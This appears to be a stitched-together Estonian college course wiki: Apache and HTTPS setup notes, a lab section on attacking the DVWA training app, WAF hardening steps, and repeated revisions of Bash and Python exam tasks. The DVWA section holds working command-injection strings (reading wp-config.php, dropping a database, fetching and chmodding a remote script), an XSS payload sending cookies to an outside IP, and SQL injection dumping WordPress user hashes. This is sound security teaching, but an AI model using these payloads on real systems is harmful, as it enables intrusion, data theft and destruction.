LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined
</source>

Tee apache2 teenusele restart
<source lang="bash">
service apache2 restart
</source>

=DVWA ründed=
=HTTPS konfigureerimine=

ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key
<pre>
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
| . |
| + . |
| o + |
| * o |
| S + O |
| ..+ + + . |
| ...o o = |
| o+ o . |
| .o. E |
+-----------------+
</pre>

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req

<pre>
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:EE
State or Province Name (full name) [Some-State]:Harjumaa
Locality Name (eg, city) []:Tallinn
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

</pre>

sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem

<pre>
Signature ok
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz
Getting Private key
</pre>

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Seal muuta sisu (sert, dokument root, keyfail)

Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile

<pre>
ServerName www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key
</pre>

a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

=ID kaart=

[[ID kaardiga autentimine Apache2 veebiserveriga]]

=DVWA ründed=
==cmd exec==
<source lang="bash">
8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php
</source>

<source lang="bash">
8.8.8.8; ls -l
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//' ../../../../wordpress/wp-config.php
</source>

Loon faili kala /var/tmp kataloogi
<source lang="bash">
8.8.8.8; touch /var/tmp/kala.txt
</source>

Ning kontrollin kas fail loodi
<source lang="bash">
8.8.8.8; ls /var/tmp/
</source>

kustutada andmebaas (eelnevalt uurida andmebaasi nime ning parooli):
<source lang="bash">
8.8.8.8;mysqladmin DROP dvwa -y;
</source>

kuvada failide infot:
<source lang="bash">
8.8.8.8;cat /etc/apache2/sites-enabled/www.planet.zz
</source>

skripti laadimine serverisse ning sellele käivitusbiti andmine:
<source lang="bash">
8.8.8.8; wget http://enos.itcollege.ee/~kloodus/osadmin/skript.sh -O /var/tmp/skript; chmod +x /var/tmp/skript/skript.sh
</source>

Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
<source lang="bash">
; grep session.cookie_httponly /etc/php5/apache2/php.ini
</source>
Väljund:
* kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:

'''session.cookie_httponly = 1'''

* kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))

'''session.cookie_httponly = 0'''

==XSS==
<source lang="javascript">
<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>
</source>
==veel XSSi==
<pre>
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E
</pre>
==SQLi==
<source lang="sql">
#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --

2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --

3' union select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --

4' union select user_login,user_pass from wp.wp_users; #

3' union select TABLE_NAME,concat(COLUMN_NAME,'-','LISA') from information_schema.columns; #
</source>

=GreenSQL firewall=

<source lang="bash">
wget http://elab.itcollege.ee:8000/Day3/greensql-fw_1.3.0_amd64.deb

dpkg -i greensql-fw_1.3.0_amd64.deb

apt-get install -f

#Modify existing virtualhost or create new virtualhost.

cd /var/www/EXISTINGORNEW
ln -s /usr/share/greensql-fw/ greensql

cd greensql
chmod 0777 templates_c
</source>

Kasutajanimi veebiliidesel on '''admin''' ja parool '''pwd'''.

Muutke DVWA config failis andmebaasi asukohta:

<pre>
$_DVWA[ 'db_server' ] = '127.0.0.1:3305';
</pre>

<source lang="bash">
#lisage faili /etc/rc.local järgmine ride ENNE exit 0 rida
service greensql-fw start
</source>

=modsecurity=
==installeerimine==

<source lang="bash">
apt-get install libapache2-mod-security2
</source>

==CRS==
https://github.com/SpiderLabs/owasp-modsecurity-crs

=Apache2 tweaks=
<source lang="apache">
ServerSignature Off
ServerTokens Prod
</source>

http://chandank.com/webservers/apache/apache-web-server-hardening-security?start=3

== Apache testimine ==
Lisaks ab'le on olemas ka teisi utiliite:

1.Apache JMeter - http://jmeter.apache.org/download_jmeter.cgi 
2. httperf - http://www.hpl.hp.com/research/linux/httperf/download.php 
3. OpenWebLoad - http://openwebload.sourceforge.net/#download 
4. Allmon - https://code.google.com/p/allmon/downloads/list 
5. CLIF - http://clif.ow2.org/download/index.html 
6. curl-loader - http://sourceforge.net/projects/curl-loader/files/ 
7. deluge(alates 2002 ei ole uusi versioone) - http://sourceforge.net/projects/deluge/ 
8. dieseltest(ainult windowsile ning pole uuendatud aastast 2001) - http://sourceforge.net/projects/dieseltest/ 
9. FWPTT - http://sourceforge.net/projects/fwptt/files/ 
10. http_load - http://www.acme.com/software/http_load/

Skriptimiskeelte arvestustööd ja kontrolltööd

2015-04-07T07:41:36Z

Mernits: /* BASH kontrolltöö 7. aprill 2015.a. */

==BASH kontrolltöö 7. aprill 2015.a.==

Loo skript, mis saab käsurealt kaks parameetrit. 1. Sisendfail 2. Väljundfail

* Skript kontrollib, et sisendfail on fail ja loetav. (vastasel juhul exit 1)
* Skript kontrollib, kas väljundfaili saab kirjutamiseks avada. (vastasel juhul exit 2)
* Skript kontrollib, kas parameetreid on täpselt kaks (vastasel juhul exit 3)

* Skript loeb sisendfailist failide ja kataloogide nimekirja (näiteks kujul)
<pre>
/etc/passwd
/etc/
/var/log
/sedapoleolemas
</pre>

* Skript kirjutab väljundfaili failinime ja kas tegu oli failiga (FAIL) või kataloogoga (DIR). Lisaks kirjutab skript väljundfaili faili või kataloogi omaniku. Kui faili/kataloogi ei ole, siis kirjutab (not found). Tulpade eraldajateks on komad. Näiteväljund eelmise näite kohta.
<pre>
/etc/passwd,FAIL,root
/etc/,DIR,root
/var/log,DIR,root
/sedapoleolemas,not found
</pre>

==Arvestus 18.oktoober kaugõpe==

Loo skript, mis laeb etteantud asukohast alla ühe faili ja kui fail on gz|tar, siis pakib vastava faili lahti teise parameetrina antud kausta (kui kausta pole, siis luuakse). Kui skriptil on kolmas parameeter, siis sätib kausta omanikuks kolmanda parameetri väärtuse ja kui skriptil on neljas parameeter, siis sätib kausta grupiks neljanda parameetri. Skript peab kontrollima, et käivitatakse root õigustes.

./skript http://enos.itcollege.ee/~mernits/a/kala kaust kasutajanimi grupp

http://enos.itcollege.ee/~mernits/a/kala
http://enos.itcollege.ee/~mernits/a/kala2

==Arvestus 7.november kaugõpe==

NB: seda saab lahendada siis, kui bash kodutööd (failiteenus, veebiteenus või õppejõuga kokkulepitud kodutöö on saadetud). Lahendusi ootan 14:00-ks

Loo skript, mis saab käsurealt 2 parameetrit 1. kasutajanimi 2. failinimi

Skript peab kontrollima, et oleks kaks parameetrit, lisaks kasutaja peab olemas olema ja fail loetav. Kui tingimused pole täidetud, siis tuleb kasutajat teavitada ja väljuda veakoodiga 1.

Teise parameetrina antud failinimes on failide ja kataloogide nimekiri iga kirje eraldi real, nagu näiteks:
<pre>
/var/kala
/var/kala/kala.txt
/var/kala/kala2.txt
</pre>
Skript sätib kõikide failide omanikuks kasutaja, mis anti esimese parameetrina. Kataloogide puhul ei tohi omaniku muuta. St näites on esimene rida ilmselt kataloog (seda tuleb ise testida -d abil näiteks), siis esimese rea puhul ei tehta midagi.

Kui faili/kataloogi ei ole, siis tuleb vastav fail/kataloog ise tekitada. Kui rea lõpus on / siis tuleb teha kataloog (kui pole) ja kui rida ei lõpe / märgiga siis tuleb luua fail, kui seda pole. Kui skript ise loob faile/katalooge, siis omanikuks/grupiks on käsurea esimene parameeter.

==Arvestus 8.november kaugõpe==
Loo skript, mis saab kaks käsurea parameetrit. 1. kasutajanimi 2. kausta nimi. Kui kasutajat/kausta ei ole või on vale arv parameetreid, siis tuleb töö katkestada veakoodiga 1.

Skript leiab teise käsurea parameetrina antud kasutast kõik kasutajale kuuluvad failid ja teeb nendele sümlingid, kus originaalfailinimele on ette lisatud kasutajanimi.

Näiteks kasut oli /var ja seal oli kasutale audio kuuluv fail /var/kala.txt, siis luuakse sümlink /var/audiokala.txt, mis viitab failile /var/kala.txt-le.

Lisaks tehakse igale kasutajale kuuluvale failile veel teine sümlink, kus failinime ette on liidetud faili md5 räsi.

Näiteks /var/kala.txt-le mille sees on 000 viitab räsi /var/23ebe88c0224f4f4fc0b608216e98735kala.txt

Ülesande tekst pange skriptile kaasa. Skript tuleb saata enne 14:00-i

==Arvestus 29.november kaugõpe==
Loo skript, mis saab kaks käsurea parameetrit. 1. Serveri nimi või IP aadress, 2. failinimi, kus sees on URL ja otsitav string.

Skript teeb käsurea parameeteriga antud serveri pihta GET päringuid, mis on teise argumendina antud failis ja otsib vastusena saadud lehelt samas failis antud otsitavat stringi.

Kui string leitakse kirjutataks väljundisse:

SERVER,URL,otsitavstring,kellaaeg (aasta, kuu, päev, tund, minut, sekund), OK või NOK

näitefail:

/index.html,itcollege.ee

/kama/index.html,Siin ei ole kama

==Bash arvestus 31. jaanuar 2015.a. kaugõpe==
Loo skript, mis saab viis käsurea parameetrit. 1. kasutajanimi, 2. failinimi, 3. grupinimi, 4. kataloogi nimi, 5. pakinimi

1. Skript kontrollib, kas kasutaja on olemas. Kui pole siis exit 1

2. Skript kontrollib, kas grupp on olemas. Kui pole, siis loob

3. Skript kontrollib, kas käsurealt antud failinimi on olemas, kui pole, siis loob. Skript määrab faili kasutajaks antud kasutaja ja grupiks antud grupi

4. Skript kontrollib, kas antud kataloog on olemas ja kui on, siis kopeerib /var/log/ kaustast kõik .log laiendiga failid sinna kausta

5. Skript kontrollib, kas antud pakk on paigaldatud ja ütleb kasutajale, kas pakk on paigaldatud või ei ole.

==Python arvestustöö kaubõppele 31. jaanuar 2015.a.==
Loo skript, mis saab kaks käsurea argumenti, sisendfail ja väljundfail.

Sisendfailis on suvaline tekst.

Skript loeb kokku kõik sisendfaili erinevad sõnad ja kirjutab tulemuse väljundfaili kujul.

SÕNA,MITU,PROTSENT

Näiteks failis on neli sõna:
siin ei ole kala

Väljund on:
<pre>
siin,1,0.25
ei,1,0,25
ole,1,0.25
kala,1,0.25
</pre>

==Arvestustöö neile, kellel python kodutöö on saadetud. Arvestus tuleb saata hiljemalt esmaspäeval 22.detsembril==

Loo skript, mis saab kaks käsurea argumenti, sisendfail ja väljundfail.

Sisendfailis on suvaline tekst.

Skript loeb kokku kõikide sisendfailis olnud tähtede esinemissageduse ja kirjutab selle väljundisse kujul.

TÄHT,MITU_OLI,PROTSENT kogu tähtede arvust

Näiteks sisendfail sisaldab:

Siin ei ole kala

Väljundfail:
<pre>
s,1,7.6923077
i,3,23.0769231
n,1,7.6923077
e,2,15.3846154
o,1,7.6923077
l,2,15.3846154
k,1,7.6923077
a,2,15.3846154
</pre>

Kui skriptil on vale arv parameetreid või skript ei saa faile avada sobivaks operatsiooniks või faili kirjutada/lugeda, siis tuleb tagastada veakood sys.exit(X). Veakoodid valid ja dokumenteerid ise.

==Näidiskodutöö neile, kes ise teemat ei leidnud ja õppejõult ei saanud==

Skriptil on kaks parameetrit.

1. sisendfaili nimi

2. väljundfaili nimi

Skript kontrollib, et ette oleks antud kaks parameetrit ja sisendfailist saab lugeda ja väljundfaili saab kirjutada.

Sisendfailis on komadega eraldatud 3 tulpa

1. URL,kasutajanmi,parool,otsitav string

Näiteks
<pre>
http://enos.itcollege.ee,robot,kala,Server
http://enos.itcollege.ee/~mernits/basicauth/kala.html,robot,kala,SIIN EI OLE KALA
http://robot.itcollege.ee/kala.html,,,KALA
</pre>

Kui server nõuab basic autentimist, siis kasutad antud kasutajanime ja parooli. Kui server ei nõua autentimist, siis kasutajanime ja parooli ei saadeta.

Kui kasutajanimi ja parool puuduvad, siis kasutajanime ja parooli ei saadeta. (kasutajanimi ja parool ei pea olema kirjas)

Skript teeb päringu iga sisendfaili rea kohta ja kirjutab väljundfaili kujul:

URL,kuupäev-kellaaeg kujul (AAASTA-KUU-PÄEV TUNNID:MINUTID:SEKUNDID),kasutajanimi,parool,otsitav string,OK

Kui päringu vastuses oli otsitav string ja rea:

URL,kuupäev-kellaaeg kujul (AAASTA-KUU-PÄEV TUNNID:MINUTID:SEKUNDID),kasutajanimi,parool,otsitav string,NOK

Kui otsitav string puudus, või kasutajanimi parool oli vale või server ei vastanud (ehk kõik ülejäänud juhud, kui otsitavat stringi ei leitud)

==Kodutöö või arvestuse python skript (neile, kes esitavad selle kuni 28.mai.2013 enne arvestuse algust)==

Looge skript, mis teeb päringuid esimese argumendina antud veebilehe pihta ja vahetab iga päringuga browser stringi, millede nimekiri on ette antud failis data.txt

Failinimi olgu kujul p2ring.eesnimi.perenimi.py, ehk kirjutad sinna oma nime

Näiteks: ./p2ring.margus.ernits.py http://wiki.itcollege.ee/

ja data näitesisu:
<pre>
Mozilla (libwhisker/2.4)
Mozilla (Mozilla@somewhere.com)
Mozilla 4.0(compatible; BotSeer/1.0; +http://botseer.ist.psu.edu)
Mozilla/1.1 (compatible; MSPIE 2.0; Windows CE)
Mozilla/1.10 [en] (Compatible; RISC OS 3.70; Oregano 1.10)
Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0)
Mozilla/2.0
Mozilla/2.0 (compatible; AOL 3.0; Mac_PowerPC)
</pre>

Veatöötlis: Kui faili ei ole või seda ei saa avada, siis skripti väljumiskood (exit code) on 1.

Hindid: urllib2 urllib changing user agent

Skript saatke õppejõu (Margus Ernits) e-posti aadressile margus.ernitsÄTTitcollege.ee.

NB: Sama ülesannet võib esitada bash arvestustööna, kui kodutöö on olemas.

Skriptimiskeelte arvestustööd ja kontrolltööd

2015-04-07T07:40:12Z

Mernits: /* BASH kontrolltöö 7. aprill 2015.a. */

==BASH kontrolltöö 7. aprill 2015.a.==

Loo skript, mis saab käsurealt kaks parameetrit. 1. Sisendfail 2. Väljundfail

* Skript kontrollib, et sisendfail on fail ja loetav. (vastasel juhul exit 1)
* Skript kontrollib, kas väljundfaili saab kirjutamiseks avada. (vastasel juhul exit 2)
* Skript kontrollib, kas parameetreid on täpselt kaks (vastasel juhul exit 3)

* Skript loeb sisendfailist failide ja kataloogide nimekirja (näiteks kujul)
<pre>
/etc/passwd
/etc/
/var/log
</pre>

* Skript kirjutab väljundfaili failinime ja kas tegu oli failiga (FAIL) või kataloogoga (DIR). Lisaks kirjutab skript väljundfaili faili või kataloogi omaniku. Tulpade eraldajateks on komad. Näiteväljund eelmise näite kohta.
<pre>
/etc/passwd,FAIL,root
/etc/,DIR,root
/var/log,DIR,root
</pre>

==Arvestus 18.oktoober kaugõpe==

Loo skript, mis laeb etteantud asukohast alla ühe faili ja kui fail on gz|tar, siis pakib vastava faili lahti teise parameetrina antud kausta (kui kausta pole, siis luuakse). Kui skriptil on kolmas parameeter, siis sätib kausta omanikuks kolmanda parameetri väärtuse ja kui skriptil on neljas parameeter, siis sätib kausta grupiks neljanda parameetri. Skript peab kontrollima, et käivitatakse root õigustes.

./skript http://enos.itcollege.ee/~mernits/a/kala kaust kasutajanimi grupp

http://enos.itcollege.ee/~mernits/a/kala
http://enos.itcollege.ee/~mernits/a/kala2

==Arvestus 7.november kaugõpe==

NB: seda saab lahendada siis, kui bash kodutööd (failiteenus, veebiteenus või õppejõuga kokkulepitud kodutöö on saadetud). Lahendusi ootan 14:00-ks

Loo skript, mis saab käsurealt 2 parameetrit 1. kasutajanimi 2. failinimi

Skript peab kontrollima, et oleks kaks parameetrit, lisaks kasutaja peab olemas olema ja fail loetav. Kui tingimused pole täidetud, siis tuleb kasutajat teavitada ja väljuda veakoodiga 1.

Teise parameetrina antud failinimes on failide ja kataloogide nimekiri iga kirje eraldi real, nagu näiteks:
<pre>
/var/kala
/var/kala/kala.txt
/var/kala/kala2.txt
</pre>
Skript sätib kõikide failide omanikuks kasutaja, mis anti esimese parameetrina. Kataloogide puhul ei tohi omaniku muuta. St näites on esimene rida ilmselt kataloog (seda tuleb ise testida -d abil näiteks), siis esimese rea puhul ei tehta midagi.

Kui faili/kataloogi ei ole, siis tuleb vastav fail/kataloog ise tekitada. Kui rea lõpus on / siis tuleb teha kataloog (kui pole) ja kui rida ei lõpe / märgiga siis tuleb luua fail, kui seda pole. Kui skript ise loob faile/katalooge, siis omanikuks/grupiks on käsurea esimene parameeter.

==Arvestus 8.november kaugõpe==
Loo skript, mis saab kaks käsurea parameetrit. 1. kasutajanimi 2. kausta nimi. Kui kasutajat/kausta ei ole või on vale arv parameetreid, siis tuleb töö katkestada veakoodiga 1.

Skript leiab teise käsurea parameetrina antud kasutast kõik kasutajale kuuluvad failid ja teeb nendele sümlingid, kus originaalfailinimele on ette lisatud kasutajanimi.

Näiteks kasut oli /var ja seal oli kasutale audio kuuluv fail /var/kala.txt, siis luuakse sümlink /var/audiokala.txt, mis viitab failile /var/kala.txt-le.

Lisaks tehakse igale kasutajale kuuluvale failile veel teine sümlink, kus failinime ette on liidetud faili md5 räsi.

Näiteks /var/kala.txt-le mille sees on 000 viitab räsi /var/23ebe88c0224f4f4fc0b608216e98735kala.txt

Ülesande tekst pange skriptile kaasa. Skript tuleb saata enne 14:00-i

==Arvestus 29.november kaugõpe==
Loo skript, mis saab kaks käsurea parameetrit. 1. Serveri nimi või IP aadress, 2. failinimi, kus sees on URL ja otsitav string.

Skript teeb käsurea parameeteriga antud serveri pihta GET päringuid, mis on teise argumendina antud failis ja otsib vastusena saadud lehelt samas failis antud otsitavat stringi.

Kui string leitakse kirjutataks väljundisse:

SERVER,URL,otsitavstring,kellaaeg (aasta, kuu, päev, tund, minut, sekund), OK või NOK

näitefail:

/index.html,itcollege.ee

/kama/index.html,Siin ei ole kama

==Bash arvestus 31. jaanuar 2015.a. kaugõpe==
Loo skript, mis saab viis käsurea parameetrit. 1. kasutajanimi, 2. failinimi, 3. grupinimi, 4. kataloogi nimi, 5. pakinimi

1. Skript kontrollib, kas kasutaja on olemas. Kui pole siis exit 1

2. Skript kontrollib, kas grupp on olemas. Kui pole, siis loob

3. Skript kontrollib, kas käsurealt antud failinimi on olemas, kui pole, siis loob. Skript määrab faili kasutajaks antud kasutaja ja grupiks antud grupi

4. Skript kontrollib, kas antud kataloog on olemas ja kui on, siis kopeerib /var/log/ kaustast kõik .log laiendiga failid sinna kausta

5. Skript kontrollib, kas antud pakk on paigaldatud ja ütleb kasutajale, kas pakk on paigaldatud või ei ole.

==Python arvestustöö kaubõppele 31. jaanuar 2015.a.==
Loo skript, mis saab kaks käsurea argumenti, sisendfail ja väljundfail.

Sisendfailis on suvaline tekst.

Skript loeb kokku kõik sisendfaili erinevad sõnad ja kirjutab tulemuse väljundfaili kujul.

SÕNA,MITU,PROTSENT

Näiteks failis on neli sõna:
siin ei ole kala

Väljund on:
<pre>
siin,1,0.25
ei,1,0,25
ole,1,0.25
kala,1,0.25
</pre>

==Arvestustöö neile, kellel python kodutöö on saadetud. Arvestus tuleb saata hiljemalt esmaspäeval 22.detsembril==

Loo skript, mis saab kaks käsurea argumenti, sisendfail ja väljundfail.

Sisendfailis on suvaline tekst.

Skript loeb kokku kõikide sisendfailis olnud tähtede esinemissageduse ja kirjutab selle väljundisse kujul.

TÄHT,MITU_OLI,PROTSENT kogu tähtede arvust

Näiteks sisendfail sisaldab:

Siin ei ole kala

Väljundfail:
<pre>
s,1,7.6923077
i,3,23.0769231
n,1,7.6923077
e,2,15.3846154
o,1,7.6923077
l,2,15.3846154
k,1,7.6923077
a,2,15.3846154
</pre>

Kui skriptil on vale arv parameetreid või skript ei saa faile avada sobivaks operatsiooniks või faili kirjutada/lugeda, siis tuleb tagastada veakood sys.exit(X). Veakoodid valid ja dokumenteerid ise.

==Näidiskodutöö neile, kes ise teemat ei leidnud ja õppejõult ei saanud==

Skriptil on kaks parameetrit.

1. sisendfaili nimi

2. väljundfaili nimi

Skript kontrollib, et ette oleks antud kaks parameetrit ja sisendfailist saab lugeda ja väljundfaili saab kirjutada.

Sisendfailis on komadega eraldatud 3 tulpa

1. URL,kasutajanmi,parool,otsitav string

Näiteks
<pre>
http://enos.itcollege.ee,robot,kala,Server
http://enos.itcollege.ee/~mernits/basicauth/kala.html,robot,kala,SIIN EI OLE KALA
http://robot.itcollege.ee/kala.html,,,KALA
</pre>

Kui server nõuab basic autentimist, siis kasutad antud kasutajanime ja parooli. Kui server ei nõua autentimist, siis kasutajanime ja parooli ei saadeta.

Kui kasutajanimi ja parool puuduvad, siis kasutajanime ja parooli ei saadeta. (kasutajanimi ja parool ei pea olema kirjas)

Skript teeb päringu iga sisendfaili rea kohta ja kirjutab väljundfaili kujul:

URL,kuupäev-kellaaeg kujul (AAASTA-KUU-PÄEV TUNNID:MINUTID:SEKUNDID),kasutajanimi,parool,otsitav string,OK

Kui päringu vastuses oli otsitav string ja rea:

URL,kuupäev-kellaaeg kujul (AAASTA-KUU-PÄEV TUNNID:MINUTID:SEKUNDID),kasutajanimi,parool,otsitav string,NOK

Kui otsitav string puudus, või kasutajanimi parool oli vale või server ei vastanud (ehk kõik ülejäänud juhud, kui otsitavat stringi ei leitud)

==Kodutöö või arvestuse python skript (neile, kes esitavad selle kuni 28.mai.2013 enne arvestuse algust)==

Looge skript, mis teeb päringuid esimese argumendina antud veebilehe pihta ja vahetab iga päringuga browser stringi, millede nimekiri on ette antud failis data.txt

Failinimi olgu kujul p2ring.eesnimi.perenimi.py, ehk kirjutad sinna oma nime

Näiteks: ./p2ring.margus.ernits.py http://wiki.itcollege.ee/

ja data näitesisu:
<pre>
Mozilla (libwhisker/2.4)
Mozilla (Mozilla@somewhere.com)
Mozilla 4.0(compatible; BotSeer/1.0; +http://botseer.ist.psu.edu)
Mozilla/1.1 (compatible; MSPIE 2.0; Windows CE)
Mozilla/1.10 [en] (Compatible; RISC OS 3.70; Oregano 1.10)
Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0)
Mozilla/2.0
Mozilla/2.0 (compatible; AOL 3.0; Mac_PowerPC)
</pre>

Veatöötlis: Kui faili ei ole või seda ei saa avada, siis skripti väljumiskood (exit code) on 1.

Hindid: urllib2 urllib changing user agent

Skript saatke õppejõu (Margus Ernits) e-posti aadressile margus.ernitsÄTTitcollege.ee.

NB: Sama ülesannet võib esitada bash arvestustööna, kui kodutöö on olemas.

Skriptimiskeelte arvestustööd ja kontrolltööd

2015-04-07T07:38:48Z

Mernits: /* Arvestus 18.oktoober kaugõpe */

==BASH kontrolltöö 7. aprill 2015.a.==

Loo skript, mis saab käsurealt kaks parameetrit. 1. Sisendfail 2. Väljundfail

* Skript kontrollib, et sisendfail on fail ja loetav. (vastasel juhul exit 1)
* Skript kontrollib, kas väljundfaili saab kirjutamiseks avada. (vastasel juhul exit 2)

* Skript loeb sisendfailist failide ja kataloogide nimekirja (näiteks kujul)
<pre>
/etc/passwd
/etc/
/var/log
</pre>

* Skript kirjutab väljundfaili failinime ja kas tegu oli failiga (FAIL) või kataloogoga (DIR). Lisaks kirjutab skript väljundfaili faili või kataloogi omaniku. Tulpade eraldajateks on komad. Näiteväljund eelmise näite kohta.
<pre>
/etc/passwd,FAIL,root
/etc/,DIR,root
/var/log,DIR,root
</pre>

==Arvestus 18.oktoober kaugõpe==

Loo skript, mis laeb etteantud asukohast alla ühe faili ja kui fail on gz|tar, siis pakib vastava faili lahti teise parameetrina antud kausta (kui kausta pole, siis luuakse). Kui skriptil on kolmas parameeter, siis sätib kausta omanikuks kolmanda parameetri väärtuse ja kui skriptil on neljas parameeter, siis sätib kausta grupiks neljanda parameetri. Skript peab kontrollima, et käivitatakse root õigustes.

./skript http://enos.itcollege.ee/~mernits/a/kala kaust kasutajanimi grupp

http://enos.itcollege.ee/~mernits/a/kala
http://enos.itcollege.ee/~mernits/a/kala2

==Arvestus 7.november kaugõpe==

NB: seda saab lahendada siis, kui bash kodutööd (failiteenus, veebiteenus või õppejõuga kokkulepitud kodutöö on saadetud). Lahendusi ootan 14:00-ks

Loo skript, mis saab käsurealt 2 parameetrit 1. kasutajanimi 2. failinimi

Skript peab kontrollima, et oleks kaks parameetrit, lisaks kasutaja peab olemas olema ja fail loetav. Kui tingimused pole täidetud, siis tuleb kasutajat teavitada ja väljuda veakoodiga 1.

Teise parameetrina antud failinimes on failide ja kataloogide nimekiri iga kirje eraldi real, nagu näiteks:
<pre>
/var/kala
/var/kala/kala.txt
/var/kala/kala2.txt
</pre>
Skript sätib kõikide failide omanikuks kasutaja, mis anti esimese parameetrina. Kataloogide puhul ei tohi omaniku muuta. St näites on esimene rida ilmselt kataloog (seda tuleb ise testida -d abil näiteks), siis esimese rea puhul ei tehta midagi.

Kui faili/kataloogi ei ole, siis tuleb vastav fail/kataloog ise tekitada. Kui rea lõpus on / siis tuleb teha kataloog (kui pole) ja kui rida ei lõpe / märgiga siis tuleb luua fail, kui seda pole. Kui skript ise loob faile/katalooge, siis omanikuks/grupiks on käsurea esimene parameeter.

==Arvestus 8.november kaugõpe==
Loo skript, mis saab kaks käsurea parameetrit. 1. kasutajanimi 2. kausta nimi. Kui kasutajat/kausta ei ole või on vale arv parameetreid, siis tuleb töö katkestada veakoodiga 1.

Skript leiab teise käsurea parameetrina antud kasutast kõik kasutajale kuuluvad failid ja teeb nendele sümlingid, kus originaalfailinimele on ette lisatud kasutajanimi.

Näiteks kasut oli /var ja seal oli kasutale audio kuuluv fail /var/kala.txt, siis luuakse sümlink /var/audiokala.txt, mis viitab failile /var/kala.txt-le.

Lisaks tehakse igale kasutajale kuuluvale failile veel teine sümlink, kus failinime ette on liidetud faili md5 räsi.

Näiteks /var/kala.txt-le mille sees on 000 viitab räsi /var/23ebe88c0224f4f4fc0b608216e98735kala.txt

Ülesande tekst pange skriptile kaasa. Skript tuleb saata enne 14:00-i

==Arvestus 29.november kaugõpe==
Loo skript, mis saab kaks käsurea parameetrit. 1. Serveri nimi või IP aadress, 2. failinimi, kus sees on URL ja otsitav string.

Skript teeb käsurea parameeteriga antud serveri pihta GET päringuid, mis on teise argumendina antud failis ja otsib vastusena saadud lehelt samas failis antud otsitavat stringi.

Kui string leitakse kirjutataks väljundisse:

SERVER,URL,otsitavstring,kellaaeg (aasta, kuu, päev, tund, minut, sekund), OK või NOK

näitefail:

/index.html,itcollege.ee

/kama/index.html,Siin ei ole kama

==Bash arvestus 31. jaanuar 2015.a. kaugõpe==
Loo skript, mis saab viis käsurea parameetrit. 1. kasutajanimi, 2. failinimi, 3. grupinimi, 4. kataloogi nimi, 5. pakinimi

1. Skript kontrollib, kas kasutaja on olemas. Kui pole siis exit 1

2. Skript kontrollib, kas grupp on olemas. Kui pole, siis loob

3. Skript kontrollib, kas käsurealt antud failinimi on olemas, kui pole, siis loob. Skript määrab faili kasutajaks antud kasutaja ja grupiks antud grupi

4. Skript kontrollib, kas antud kataloog on olemas ja kui on, siis kopeerib /var/log/ kaustast kõik .log laiendiga failid sinna kausta

5. Skript kontrollib, kas antud pakk on paigaldatud ja ütleb kasutajale, kas pakk on paigaldatud või ei ole.

==Python arvestustöö kaubõppele 31. jaanuar 2015.a.==
Loo skript, mis saab kaks käsurea argumenti, sisendfail ja väljundfail.

Sisendfailis on suvaline tekst.

Skript loeb kokku kõik sisendfaili erinevad sõnad ja kirjutab tulemuse väljundfaili kujul.

SÕNA,MITU,PROTSENT

Näiteks failis on neli sõna:
siin ei ole kala

Väljund on:
<pre>
siin,1,0.25
ei,1,0,25
ole,1,0.25
kala,1,0.25
</pre>

==Arvestustöö neile, kellel python kodutöö on saadetud. Arvestus tuleb saata hiljemalt esmaspäeval 22.detsembril==

Loo skript, mis saab kaks käsurea argumenti, sisendfail ja väljundfail.

Sisendfailis on suvaline tekst.

Skript loeb kokku kõikide sisendfailis olnud tähtede esinemissageduse ja kirjutab selle väljundisse kujul.

TÄHT,MITU_OLI,PROTSENT kogu tähtede arvust

Näiteks sisendfail sisaldab:

Siin ei ole kala

Väljundfail:
<pre>
s,1,7.6923077
i,3,23.0769231
n,1,7.6923077
e,2,15.3846154
o,1,7.6923077
l,2,15.3846154
k,1,7.6923077
a,2,15.3846154
</pre>

